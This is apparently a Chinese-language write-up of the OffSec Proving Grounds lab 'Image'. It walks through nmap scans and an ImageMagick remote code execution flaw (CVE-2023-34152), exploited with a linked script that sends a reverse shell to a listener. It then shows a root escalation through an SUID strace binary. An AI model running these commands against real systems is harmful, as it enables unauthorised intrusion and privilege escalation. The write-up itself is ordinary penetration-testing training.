OSCP Image Write-up

一、靶场详情

靶场名称：

Image

靶场地址：

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界：

ImageMagick 远程代码执行 –> www-data 用户权限 –> 用户旗帜

权限提升：

strace suid 权限 –> root 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描：

sudo nmap -p- 192.168.230.178 --min-rate=2000

Nmap scan report for 192.168.230.178
Host is up (0.079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

UDP 端口扫描：未发现有价值信息。

TCP 服务信息搜集：

sudo nmap -p22,80 -sCV 192.168.230.178

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: ImageMagick Identifier
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境，开放有 HTTP、SSH 服务。

3.2 渗透测试突破边界

3.2.1 ImageMagick 远程代码执行（CVE-2023-34152）

访问系统 HTTP 80 端口，页面只有一个上传接口。

尝试目录枚举没有任何发现，经测试接口仅允许上传图片格式的文件。

当上传图片上传成功后会暴漏一些版本号，尝试检索 ImageMagick 6.9.6-4，发现历史存在远程代码执行漏洞（CVE2023-34152）。

参考链接：

https://github.com/ImageMagick/ImageMagick/issues/6339

EXP 链接：

https://raw.githubusercontent.com/overgrowncarrot1/ImageTragick_CVE-2023-34152/refs/heads/main/CVE-2023-34152.py

利用 EXP 脚本生成包含反弹 shell 名称的图片，在 kali 监听 4444 端口，然后上传图片，成功获取到系统 www-data 用户 shell。

nc -lvnp 4444
python3 CVE-2023-34152.py -l 192.168.45.155 -p 4444

升级为交互式 shell。

3.2.3 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 Strace suid 提权至 root

系统 strace 程序具有 suid 权限，利用该配置可提升至系统 root 权限。

find / -perm -u=s -type f 2>/dev/null

参考链接：

https://gtfobins.github.io/gtfobins/strace/#suid

/usr/bin/strace -o /dev/null /bin/sh -p
bash -p

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流，欢迎点击「关于我」，通过页面中的微信公众号、邮箱或 Discord 与我联系；若您发现文章中存在任何错误或不足之处，也非常欢迎通过以上方式指出，在此一并致以衷心的感谢。 😊🫡

最后，祝您生活愉快！🌞✨